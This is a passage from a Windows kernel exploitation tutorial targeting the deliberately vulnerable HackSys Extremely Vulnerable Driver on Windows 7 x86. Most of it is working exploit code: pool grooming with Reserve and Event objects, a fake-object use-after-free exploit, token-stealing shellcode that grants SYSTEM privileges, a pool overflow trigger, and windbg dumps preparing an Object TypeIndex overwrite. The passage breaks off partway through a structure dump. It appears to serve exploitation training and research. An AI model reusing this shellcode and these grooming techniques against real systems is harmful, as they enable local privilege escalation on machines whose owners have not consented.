Examining the pool details of the memory address that the driver attempted to access again confirms the memory has probably been previously free'd.

Turning it into an Exploit

With a crash in hand we need to replace the memory used by the object with something which gives us code execution when referenced instead. Normally we'd have to hunt for an appropriate object and likely use a basic primitive to get us into the position of having a more useful primitive we can use to escalate our privileges. Luckily for us, the HackSys driver provides a function which makes this much easier. The log message ****** HACKSYS_EVD_IOCTL_CREATE_FAKE_OBJECT ****** precedes an exposed function which does exactly what we need.

Looking at the function's implementation, we can see it allocates 0x58 bytes of data and then checks the allocation was successful.

Once it's allocated the required memory, it copies data from the IOCTL input buffer into it.

At 1 the pointer to the allocated memory is in ebx, at 2 it validates that it is safe to read data from the input buffer and then at 3 it copies 0x16 four-byte blocks (0x58 bytes in total) from the input buffer into the newly allocated memory before returning.

The fact that the fake allocated object is the same size as the one we can free and cause to be referenced is the ideal scenario. By using the kernel pool massaging techniques described earlier we can cause the fake object to be allocated at the address the UAF object previously occupied. By loading a pointer to some token stealing shellcode at the start of the fake object, we can then trigger the Use UAF object IOCTL code handler to make the driver execute our payload.
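The sizes involved are easy to sanity check with a little arithmetic. The sketch below is my own helper, assuming the 8 byte POOL_HEADER and 8 byte pool granularity of 32 bit Windows 7; the function names are hypothetical.

```c
#include <stdint.h>

#define SKETCH_POOL_HEADER_SIZE 8u  /* POOL_HEADER size on 32 bit Windows 7 */
#define SKETCH_POOL_GRANULARITY 8u  /* pool chunks are sized in 8 byte units on x86 */

/* Total pool chunk size (header included) for a requested allocation size. */
uint32_t pool_chunk_size(uint32_t requested)
{
    uint32_t total = requested + SKETCH_POOL_HEADER_SIZE;
    return (total + SKETCH_POOL_GRANULARITY - 1) & ~(SKETCH_POOL_GRANULARITY - 1);
}

/* Number of bytes moved by a copy of `count` 4 byte blocks. */
uint32_t dword_copy_bytes(uint32_t count)
{
    return count * 4u;
}
```

Here `dword_copy_bytes(0x16)` gives 0x58, the size of the fake object, and `pool_chunk_size(0x58)` gives 0x60, which is the chunk size we need an object to match when grooming the pool.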

As the UAF object isn't 0x40 bytes like the Event object I used in the pool fengshui example, we'll use Reserve objects instead. As we found out earlier these are 0x60 bytes in memory, which matches the UAF object's 0x58 bytes once you include the 8 byte POOL_HEADER. First of all we'll need to add the following definitions.

//from https://www.nirsoft.net/kernel_struct/vista/UNICODE_STRING.html
typedef struct _UNICODE_STRING  
{
    WORD Length;
    WORD MaximumLength;
    WORD * Buffer;
} UNICODE_STRING, *PUNICODE_STRING;


//from https://www.nirsoft.net/kernel_struct/vista/OBJECT_ATTRIBUTES.html
typedef struct _OBJECT_ATTRIBUTES  
{
    ULONG Length;
    PVOID RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

//from https://github.com/JeremyFetiveau/Exploits/blob/master/MS10-058.cpp
#define IOCO 1
typedef NTSTATUS(__stdcall *NtAllocateReserveObject_t) (OUT PHANDLE hObject, IN POBJECT_ATTRIBUTES ObjectAttributes, IN DWORD ObjectType);  

Next we add the following code to carry out the actual pool fengshui, this will fill any existing free 0x60 byte regions and then create a pattern of allocated and free 0x60 byte blocks.

HANDLE hReserveObjectsDefrag[10000] = { 0x0 };  
HANDLE hReserveObjectsPoolGroom[5000] = { 0x0 };

HMODULE hModule = LoadLibraryA("ntdll.dll");

if (hModule == NULL) {  
    printf("Couldn't load ntdll, how is computer running? : 0x%X\n", GetLastError());
    return 1;
}

NtAllocateReserveObject_t NtAllocateReserveObject = (NtAllocateReserveObject_t) GetProcAddress(hModule, "NtAllocateReserveObject");

if (NtAllocateReserveObject == NULL) {  
    printf("Couldn't get a reference to NtAllocateReserveObject in ntdll?!: 0x%X\n", GetLastError());
    return 1;
}

for (unsigned int i = 0; i < 0x1000; i++) {  
    NTSTATUS status = NtAllocateReserveObject(&hReserveObjectsDefrag[i], 0, IOCO);

    if (status != 0) {
        printf("Failed to allocate defrag reserve object 0x%X: NTSTATUS 0x%X\n", i, status);
        return 1;
    }
}

for (unsigned int i = 0; i < 0x500; i++) {  
    NTSTATUS status = NtAllocateReserveObject(&hReserveObjectsPoolGroom[i], 0, IOCO);

    if (status != 0) {
        printf("Failed to allocate pool groom reserve object 0x%X: NTSTATUS 0x%X\n", i, status);
        return 1;
    }
}

for (unsigned int i = 1; i < 0x500; i += 2) {  
    if (!CloseHandle(hReserveObjectsPoolGroom[i])) {
        printf("Failed to free reserve object needed for pool hole punching 0x%X: 0x%X\n", i, GetLastError());
        return 1;
    }
}
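The hole punching pattern can be modelled in user mode without touching the kernel at all. The sketch below treats each Reserve object as a slot in an array, which is a simplification of mine: it assumes the groomed allocations really do end up contiguous and in order. The function names are hypothetical.

```c
#include <stddef.h>

/* Marks every slot allocated, then frees the odd-numbered ones,
   mirroring the CloseHandle loop above. Returns the number of holes. */
size_t punch_holes(unsigned char *slots, size_t count)
{
    size_t holes = 0;
    for (size_t i = 0; i < count; i++)
        slots[i] = 1;
    for (size_t i = 1; i < count; i += 2) {
        slots[i] = 0;
        holes++;
    }
    return holes;
}

/* Returns 1 if no two free slots are adjacent, i.e. every hole is
   exactly one object wide and cannot merge with a neighbouring hole. */
int holes_are_isolated(const unsigned char *slots, size_t count)
{
    for (size_t i = 0; i + 1 < count; i++)
        if (slots[i] == 0 && slots[i + 1] == 0)
            return 0;
    return 1;
}
```

For the 0x500 groom objects used above this gives 0x280 holes, each of them a single 0x60 byte slot with an allocated object in front of it.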

Now that we can force our fake object to be allocated where the UAF object was previously located we need to craft our fake object. We start by adding the token stealer used in the previous parts of this series to our user land code.

// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET    0x124    // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET   0x050    // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET        0x0B4    // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET      0x0B8    // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET      0x0F8    // nt!_EPROCESS.Token
#define SYSTEM_PID        0x004    // SYSTEM Process PID

VOID TokenStealingShellcodeWin7Generic() {  
    // No Need of Kernel Recovery as we are not corrupting anything
    __asm {
        ; initialize
        pushad; save registers state

        xor eax, eax; Set zero
        mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
        mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process

        mov ecx, eax; Copy current _EPROCESS structure

        mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token
        mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4

        SearchSystemPID:
        mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
            sub eax, FLINK_OFFSET
            cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
            jne SearchSystemPID

            mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
            mov[ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM
            ; to current process
            popad; restore registers state
    }
}
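If the assembly is hard to follow, the same walk can be written as a user-mode simulation in C. The `sim_process_t` struct below is a simplified stand-in of mine for _EPROCESS with only the three fields the shellcode touches; it is not the real layout. Unlike the shellcode, this version stops if it gets back to where it started.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-in for _EPROCESS: PID, link to the next process
   in the circular ActiveProcessLinks list, and the token value. */
typedef struct sim_process {
    uint32_t pid;
    struct sim_process *flink;
    uint32_t token;
} sim_process_t;

#define SIM_SYSTEM_PID 4u

/* Walks the list starting from the entry after `current` until the
   SYSTEM process is found, then copies its token over our own.
   Returns 1 on success, 0 if the walk wraps around without a match. */
int steal_system_token(sim_process_t *current)
{
    sim_process_t *p = current->flink;
    while (p != current) {
        if (p->pid == SIM_SYSTEM_PID) {
            current->token = p->token;
            return 1;
        }
        p = p->flink;
    }
    return 0;
}
```

The real shellcode does the same thing with raw offsets: follow Flink, subtract FLINK_OFFSET to get back to the start of the structure, compare the PID, and finally copy the Token field.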

Next let's create our fake object. We know it needs to be 0x58 bytes with the first four containing a function pointer; the rest of the bytes we don't care about. By setting the function pointer to the address of our token stealing shellcode, it will be executed when the driver references our fake object and triggers what it thinks is the original object's callback. This code is placed immediately after the DeviceIoControl call used to free the UAF object.

size_t nInBufferSize = 0x58;  
PULONG lpInBuffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nInBufferSize);

if (!lpInBuffer) {  
    printf("HeapAlloc failed :( 0x%X\r\n", GetLastError());
    return 1;
}
printf("Input buffer allocated as 0x%X bytes.\r\n", nInBufferSize);  
printf("Input buffer address: 0x%p\r\n", lpInBuffer);

printf("Filling buffer with A's.\r\n");  
memset(lpInBuffer, 0x41, nInBufferSize);

printf("Loading shellcode pointer into start of buffer.\r\n");  
lpInBuffer[0] = (ULONG)&TokenStealingShellcodeWin7Generic;

for (unsigned int i = 0; i < 0x250; i++) {  
    DeviceIoControl(hDriver, HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT, lpInBuffer, 0, NULL, 0, &dwBytesReturned, NULL);
}
printf("0x250 fake objects allocated.\r\n");

I created 0x250 fake objects to fill the gaps we created earlier (the hole punching loop frees 0x280 Reserve objects, so this covers most of them). Additionally we need to define HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT at the top of our file.

#define HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT            CTL_CODE(FILE_DEVICE_UNKNOWN, 0x807, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

Finally some cleanup code and a call to system to launch calc.exe fits at the end of the code.

printf("SYSTEM?!?!\r\n");  
system("calc.exe");

printf("Exploit complete, cleaning up\n");  
for (unsigned int i = 0; i < 0x1000; i++) {  
    if (!CloseHandle(hReserveObjectsDefrag[i])) {
        printf("Failed to free reserve object defrag object 0x%X: 0x%X\r\n", i, GetLastError());
        return 1;
    }
}
for (unsigned int i = 0; i < 0x500; i += 2) {  
    if (!CloseHandle(hReserveObjectsPoolGroom[i])) {
        printf("Failed to free reserve object pool groom object 0x%X: 0x%X\r\n",i, GetLastError());
        return 1;
    }
}
HeapFree(GetProcessHeap(), 0, lpInBuffer);  
CloseHandle(hDriver);  
return 0;  

Building and then running the code (with special pool disabled!) gives us a nice calculator running as SYSTEM.

The final/full code for the exploit is on Github.

HackSysTeam Extremely Vulnerable Driver Pool Overflow

The IOCTL code to trigger the driver's pool overflow vulnerability is pretty easy to find, the function call immediately after ****** HACKSYS_EVD_IOCTL_POOL_OVERFLOW ****** is logged is the obvious target.

Looking into the handler function we can see that it makes a pool allocation on the Nonpaged pool (edi is xor'd with itself at the start of the function), of size 0x1F8 bytes.
If the allocation was successful the handler then copies data from the user supplied buffer into the pool. However the amount of data copied is controlled by the size provided in the IOCTL.

This means that if a caller provides a length greater than 0x1F8 bytes, an out of bounds write will happen, which could also be called a pool overflow. Again we'll enable special pool to make triggering the vulnerability easier.

verifier /volatile /flags 0x1 /adddriver HackSysExtremeVulnerableDriver.sys  

The below code will send an IOCTL request with a 0x200 byte buffer, which writes 8 bytes past the end of the 0x1F8 byte pool allocation. This should cause it to access a page marked as inaccessible and blue screen the system.

#include "stdafx.h"
#include <Windows.h>

#define HACKSYS_EVD_IOCTL_POOL_OVERFLOW CTL_CODE(FILE_DEVICE_UNKNOWN, 0x803, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

int _tmain(int argc, _TCHAR* argv[])  
{
    DWORD lpBytesReturned;
    LPCTSTR lpDeviceName = TEXT("\\\\.\\HackSysExtremeVulnerableDriver");

    printf("Getting the device handle\r\n");
    //HANDLE WINAPI CreateFile( _In_ lpFileName, _In_ dwDesiredAccess, _In_ dwShareMode, _In_opt_ lpSecurityAttributes,
    //_In_ dwCreationDisposition, _In_ dwFlagsAndAttributes, _In_opt_ hTemplateFile );
    HANDLE hDriver = CreateFile(lpDeviceName,           //File name - in this case our device name
        GENERIC_READ | GENERIC_WRITE,                   //dwDesiredAccess - type of access to the file, can be read, write, both or neither. We want read and write because that's the permission the driver declares we need.
        FILE_SHARE_READ | FILE_SHARE_WRITE,             //dwShareMode - other processes can read and write to the driver while we're using it but not delete it - FILE_SHARE_DELETE would enable this.
        NULL,                                           //lpSecurityAttributes - Optional, security descriptor for the returned handle and declares whether inheriting processes can access it - unneeded for us.
        OPEN_EXISTING,                                  //dwCreationDisposition - what to do if the file/device doesn't exist, in this case only opens it if it already exists, returning an error if it doesn't.
        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,   //dwFlagsAndAttributes - In this case the FILE_ATTRIBUTE_NORMAL means that the device has no special file attributes and FILE_FLAG_OVERLAPPED means that the device is being opened for async IO.
        NULL);                                          //hTemplateFile - Optional, only used when creating a new file - takes a handle to a template file which defines various attributes for the file being created.

    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("Failed to get device handle :( 0x%X\r\n", GetLastError());
        return 1;
    }
    printf("Got the device Handle: 0x%X\r\n", hDriver);

    size_t nInBufferSize = 0x00000200;
    PULONG lpInBuffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nInBufferSize);

    if (!lpInBuffer) {
        printf("HeapAlloc failed :( 0x%X\r\n", GetLastError());
        return 1;
    }

    printf("Input buffer allocated as 0x%X bytes.\r\n", nInBufferSize);
    printf("Input buffer address: 0x%p\r\n", lpInBuffer);

    printf("Filling buffer.\r\n");

    memset(lpInBuffer, 0x41, nInBufferSize);

    DeviceIoControl(hDriver,
        HACKSYS_EVD_IOCTL_POOL_OVERFLOW,
        lpInBuffer,
        nInBufferSize,
        NULL, 
        0,
        &lpBytesReturned,
        NULL); 

    HeapFree(GetProcessHeap(), 0, lpInBuffer);
    CloseHandle(hDriver);
    return 0;
}
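The size of the overrun in the PoC above follows directly from the two sizes involved. The sketch below is a tiny helper of my own that makes the arithmetic explicit; it assumes, as special pool's verify end mode intends, that the allocation ends exactly at the end of its page.

```c
#include <stdint.h>

/* Number of bytes a copy of copy_length bytes writes beyond an
   allocation of allocation_size bytes (0 if it fits). */
uint32_t overrun_bytes(uint32_t allocation_size, uint32_t copy_length)
{
    return copy_length > allocation_size ? copy_length - allocation_size : 0u;
}

/* With the allocation pushed up against the end of its page, any
   overrun at all lands on the inaccessible page that follows it. */
int touches_guard_page(uint32_t allocation_size, uint32_t copy_length)
{
    return overrun_bytes(allocation_size, copy_length) > 0u;
}
```

For the 0x1F8 byte allocation and the 0x200 byte input buffer, `overrun_bytes(0x1F8, 0x200)` is 8, which is more than enough to reach the guard page.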

Compiling and then running it, we get just what we wanted.

Debugging the crash we can see that the driver has attempted to write beyond the end of an allocation, as expected.

Looking at the details of the crash we can see that it crashed at the rep movs instruction we saw earlier in the HACKSYS_EVD_IOCTL_POOL_OVERFLOW handler.

Inspecting the corrupted memory address we see a series of 0x41 bytes followed by inaccessible memory, just as expected.

Pool Overflow Pool Fengshui

As with the UAF exploit, we need to ensure that our memory is correctly located when it's allocated. In this case we want to make sure that another object immediately follows it in memory. This time our allocated memory is 0x200 bytes in size (0x1F8 + an 8 byte header). The Reserve object allocations had a size of 0x60 bytes in total, which is too small and doesn't cleanly divide the amount we want, making them impractical. However the Event objects we looked at earlier are 0x40 byte allocations. This cleanly divides our allocation into 8, which is ideal.

In order to groom the pool this time we'll again defragment it using Event objects, then we'll allocate a large number of contiguous Event objects and free them in blocks of eight. This should leave us with a repeating pattern of 0x200 bytes of free and then 0x200 bytes of allocated non-paged pool memory. The code below carries out the pool grooming before triggering a debugger break so that we can check it has worked.

#include "stdafx.h"
#include <Windows.h>

int _tmain(int argc, _TCHAR* argv[])  
{
    HANDLE hDefragEvents[0x10000];
    HANDLE hPoolGroomEvents[0x1000];

    for (unsigned int i = 0; i < 0x10000; i++) {
        HANDLE hEvent = CreateEvent(NULL, false, false, TEXT(""));
        if (hEvent == NULL) {
            printf("Failed to create defrag event 0x%X: 0x%X\r\n", i, GetLastError());
            return 1;
        }
        hDefragEvents[i] = hEvent;
    }

    printf("Pool defrag'd\r\n");

    for (unsigned int i = 0; i < 0x1000; i++) {
        HANDLE hEvent = CreateEvent(NULL, false, false, TEXT(""));
        if (hEvent == NULL) {
            printf("Failed to create groom event 0x%X: 0x%X\r\n", i, GetLastError());
            return 1;
        }
        hPoolGroomEvents[i] = hEvent;
    }

    printf("Grooming phase 1 complete - contiguous events allocated.\r\n");

    for (unsigned int i = 0; i < 0x1000; i += 0x10) {
        for (unsigned int j = 0; j < 8; j++) {
            HANDLE hEvent = hPoolGroomEvents[i + j];
            if (!CloseHandle(hEvent)) {
                printf("Failed to punch hole with event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
                return 1;
            }
        }
    }

    printf("Grooming complete - pool full o'holes\r\n");

    printf("0x88th unfree'd handle: 0x%X\r\n", hPoolGroomEvents[0x88]);

    getchar();
    DebugBreak();

    for (unsigned int i = 0; i < 0x10000; i++) {
        HANDLE hEvent = hDefragEvents[i];
        if (!CloseHandle(hEvent)) {
            printf("Failed to remove defrag event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
            return 1;
        }
    }
    for (unsigned int i = 8; i < 0x1000; i += 0x10) {
        for (unsigned int j = 0; j < 8; j++) {
            HANDLE hEvent = hPoolGroomEvents[i + j];
            if (!CloseHandle(hEvent)) {
                printf("Failed to remove pool groom event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
                return 1;
            }
        }
    }

    return 0;
}

Once this has run we can see the printed handle value and then hit enter to trigger the breakpoint.

In the kernel debugger I dump the handle information to get the objects details.

kd> !handle 0x40448  
...
40448: Object: 848c04f0  GrantedAccess: 001f0003 Entry: ab302890  
Object: 848c04f0  Type: (843d3440) Event  
    ObjectHeader: 848c04d8 (new version)
        HandleCount: 1  PointerCount: 1

Looking at the pool memory around the objects allocation we can see a nice repeating pattern of 8 allocated event objects followed by 8 free event objects, exactly as planned ^^

848c00c0 size:   40 previous size:   40  (Allocated)  Even (Protected)  
 848c0100 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0140 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0180 size:   40 previous size:   40  (Free )  Even (Protected)
 848c01c0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0200 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0240 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0280 size:   40 previous size:   40  (Free )  Even (Protected)
 848c02c0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c03c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0480 size:   40 previous size:   40  (Allocated)  Even (Protected)
*848c04c0 size:   40 previous size:   40  (Allocated) *Even (Protected)
        Pooltag Even : Event objects
 848c0500 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0540 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0580 size:   40 previous size:   40  (Free )  Even (Protected)
 848c05c0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0600 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0640 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0680 size:   40 previous size:   40  (Free )  Even (Protected)
 848c06c0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0740 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0780 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c07c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0840 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c08c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 848c0900 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0940 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0980 size:   40 previous size:   40  (Free )  Even (Protected)
 848c09c0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0a00 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0a40 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0a80 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0ac0 size:   40 previous size:   40  (Free )  Even (Protected)
 848c0b00 size:   40 previous size:   40  (Allocated)  Even (Protected)
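The pattern in the dump can be reproduced with a small user-mode model of the grooming loop. As before this is only a sketch: each Event object is a slot in an array, and the idea that consecutive handles map to consecutive pool chunks is an assumption, not something the model proves. The function names are mine.

```c
#include <stddef.h>

#define SKETCH_EVENT_CHUNK 0x40u  /* Event object chunk size from the pool dump */

/* Marks all slots allocated, then frees the first 8 of every 16,
   following the index pattern of the CloseHandle loop in the groom code.
   Returns the number of 8-slot holes created. */
size_t punch_event_holes(unsigned char *slots, size_t count)
{
    size_t holes = 0;
    for (size_t i = 0; i < count; i++)
        slots[i] = 1;
    for (size_t i = 0; i + 8 <= count; i += 0x10) {
        for (size_t j = 0; j < 8; j++)
            slots[i + j] = 0;
        holes++;
    }
    return holes;
}

/* Size in bytes of the run of free slots starting at index start. */
size_t free_run_bytes(const unsigned char *slots, size_t count, size_t start)
{
    size_t n = 0;
    while (start + n < count && slots[start + n] == 0)
        n++;
    return n * SKETCH_EVENT_CHUNK;
}
```

For 0x1000 groom events this yields 0x100 holes of 0x200 bytes each, and every hole is followed by an allocated Event object, which is the chunk whose headers the overflow will reach.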

Now that we can trigger our overflow safe in the knowledge a 0x40 byte Event object will follow the memory we control, we can start putting together exploits.

Pool Overflow Exploitation Round 1

Now that we can reliably overwrite the header for an Event object, we need to actually overwrite something. I'm going to use two different methods, one which was originally discussed in Kernel Pool Exploitation on Windows 7 and one which was discussed in Data-only Pwning Microsoft Windows Kernel: Exploitation of Kernel Pool Overflows on Microsoft Windows 8.1. First of all I'm going to use the Object Type index overwrite technique (described in Nikita's talk) which is also how b33f and Ashfaq Ansari exploited this, if you want a different/probably better take.

As explained in this Code Machine blog post, each object within kernel memory on Windows consists of several structures as well as the object structure itself. The first of these is the POOL_HEADER structure we've discussed before. Here's an example for an Event object. We won't be corrupting this structure this time, so we'll re-use these values in our exploit to leave it intact while we overwrite another structure further along in memory.

dt nt!_POOL_HEADER 846a0a40  
   + 0x000 PreviousSize : Pos 0, 9 Bits  => 0x40  
   + 0x000 PoolIndex : Pos 9, 7 Bits => 0x0
   + 0x002 BlockSize : Pos 0, 9 Bits => 0x40
   + 0x002 PoolType : Pos 9, 7 Bits => 0x2 (Non-Paged Pool)
   + 0x000 Ulong1 : Uint4B => 0x04080040 (Just a union field)
   +0x004 PoolTag          : 0xee657645
   +0x004 AllocatorBackTraceIndex : 0x7645
   +0x006 PoolTagHash      : 0xee65
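To see how the Ulong1 and PoolTag values break down into the individual fields, here is a small decoder written against the bit positions in the dt output above. The struct and function names are my own. One thing to keep in mind is that the raw size fields are counted in 8 byte units on x86, so a raw BlockSize of 0x8 is the 0x40 bytes of an Event chunk, and a raw PreviousSize of 0x40 describes a 0x200 byte chunk in front of it.

```c
#include <stdint.h>

typedef struct {
    uint32_t previous_size;  /* bits 0-8, raw value in 8 byte units */
    uint32_t pool_index;     /* bits 9-15 */
    uint32_t block_size;     /* bits 16-24, raw value in 8 byte units */
    uint32_t pool_type;      /* bits 25-31 */
} pool_header_fields_t;

/* Splits the Ulong1 union field into its four bitfields. */
pool_header_fields_t decode_ulong1(uint32_t ulong1)
{
    pool_header_fields_t f;
    f.previous_size = ulong1 & 0x1FFu;
    f.pool_index    = (ulong1 >> 9) & 0x7Fu;
    f.block_size    = (ulong1 >> 16) & 0x1FFu;
    f.pool_type     = (ulong1 >> 25) & 0x7Fu;
    return f;
}

/* Writes the four tag characters plus a terminator into out, with the
   top bit of the tag cleared. Returns 1 if that top bit (which marks
   the allocation as protected) was set. */
int decode_pool_tag(uint32_t tag, char out[5])
{
    int is_protected = (tag & 0x80000000u) != 0;
    uint32_t clean = tag & 0x7FFFFFFFu;
    for (int i = 0; i < 4; i++)
        out[i] = (char)((clean >> (8 * i)) & 0xFFu);
    out[4] = '\0';
    return is_protected;
}
```

Decoding 0x04080040 gives PreviousSize 0x40, PoolIndex 0, BlockSize 0x8 and PoolType 2, and decoding 0xee657645 gives the tag "Even" with the protected bit set, matching the (Protected) marker in the pool dump.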

Next there are one or more optional structures. Which optional structures are present can be found by looking at the last structure which appears before the actual object, the OBJECT_HEADER. An example OBJECT_HEADER layout from an Event object is shown below:

dt nt!_OBJECT_HEADER 846a0a58  
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xc ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x8595e540 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8595e540 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

The InfoMask field only had bit 0x8 set, which means the only optional structure between the pool header and the object header is OBJECT_HEADER_QUOTA_INFO as described in the Code Machine article. The article also tells us its size is 0x10 bytes, so we can view it in memory by looking 0x10 bytes further back.

 dt nt!_OBJECT_HEADER_QUOTA_INFO 846a0a48 
   +0x000 PagedPoolCharge  : 0
   +0x004 NonPagedPoolCharge : 0x40
   +0x008 SecurityDescriptorCharge : 0
   +0x00c SecurityDescriptorQuotaBlock : (null)
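The InfoMask lookup can be sketched as a small table. The quota info entry (bit 0x8, 0x10 bytes) comes straight from the text above; the other bits and sizes are my recollection of the 32 bit Windows 7 values from the Code Machine article and should be treated as assumptions to check against it. All names here are hypothetical.

```c
#include <stdint.h>

/* Optional header flags and sizes on 32 bit Windows 7. Only the quota
   info entry is confirmed by the dumps above; treat the rest as assumed. */
typedef struct {
    uint8_t  mask_bit;
    uint32_t size;
} optional_header_t;

static const optional_header_t sketch_optional_headers[] = {
    { 0x01, 0x10 },  /* OBJECT_HEADER_CREATOR_INFO (assumed) */
    { 0x02, 0x10 },  /* OBJECT_HEADER_NAME_INFO (assumed) */
    { 0x04, 0x08 },  /* OBJECT_HEADER_HANDLE_INFO (assumed) */
    { 0x08, 0x10 },  /* OBJECT_HEADER_QUOTA_INFO */
    { 0x10, 0x08 },  /* OBJECT_HEADER_PROCESS_INFO (assumed) */
};

/* Total size of the optional headers selected by info_mask. */
uint32_t optional_headers_size(uint8_t info_mask)
{
    uint32_t total = 0;
    for (unsigned i = 0; i < sizeof(sketch_optional_headers) / sizeof(sketch_optional_headers[0]); i++)
        if (info_mask & sketch_optional_headers[i].mask_bit)
            total += sketch_optional_headers[i].size;
    return total;
}

/* Address of the first optional header, given the OBJECT_HEADER address. */
uint32_t first_optional_header(uint32_t object_header, uint8_t info_mask)
{
    return object_header - optional_headers_size(info_mask);
}
```

For the Event object above, `first_optional_header(0x846a0a58, 0x8)` gives 0x846a0a48, the address used in the dt command, which sits directly after the 8 byte POOL_HEADER at 0x846a0a40.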

The OBJECT_HEADER structure is the one we'll be corrupting, so when we overwrite the OBJECT_HEADER_QUOTA_INFO structure on the way to it we'll reuse its default values to leave it intact.

The OBJECT_HEADER structure contains object metadata for managing the object, indicating optional headers, storing debug information etc. As described in Nikita's slides this header includes the 'TypeIndex' field, this is used as an index into the ObTypeIndexTable which is used to store pointers to the OBJECT_TYPE structures which provide important details about each object to the kernel. Looking at the ObTypeIndexTable in windbg we can see the entries.

dd nt!ObTypeIndexTable  
82b46580  00000000 bad0b0b0 841338c8 84133800  
82b46590  84133738 841334f0 841b8040 841b8f78  
82b465a0  841b8eb0 841b8de8 841b8d20 841b8668  
82b465b0  841bd440 841d9f78 841cd040 841c7418  

Viewing entry 0xc as an OBJECT_TYPE structure gives us the following:

dt nt!_OBJECT_TYPE poi(nt!ObTypeIndexTable + (4*0xc))  
   +0x000 TypeList         : _LIST_ENTRY [ 0x841bd440 - 0x841bd440 ]
   +0x008 Name             : _UNICODE_STRING "Event"
   +0x010 DefaultObject    : (null) 
   +0x014 Index            : 0xc ''
   +0x018 TotalNumberOfObjects : 0x6957
   +0x01c TotalNumberOfHandles : 0x69a6
   +0x020 HighWaterNumberOfObjects : 0x7477
   +0x024 HighWaterNumberOfHandles : 0x74d1
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0x078 TypeLock         : _EX_PUSH_LOCK
   +0x07c Key              : 0x6e657645
   +0x080 CallbackList     : _LIST_ENTRY [ 0x841bd4c0 - 0x841bd4c0 ]

So we definitely have the correct object type, but there's nothing that will obviously give us code execution. Looking further into the structure we see the TypeInfo field, examining this closer in windbg shows us a nice series of function pointers.

dt nt!_OBJECT_TYPE_INITIALIZER (poi(nt!ObTypeIndexTable + (4*0xc)) + 0x28)  
   +0x000 Length           : 0x50
   +0x002 ObjectTypeFlags  : 0 ''
   +0x002 CaseInsensitive  : 0y0
   +0x002 UnnamedObjectsOnly : 0y0
   +0x002 UseDefaultObject : 0y0
   +0x002 SecurityRequired : 0y0
   +0x002 MaintainHandleCount : 0y0
   +0x002 MaintainTypeList : 0y0
   +0x002 SupportsObjectCallbacks : 0y0
   +0x002 CacheAligned     : 0y0
   +0x004 ObjectTypeCode   : 2
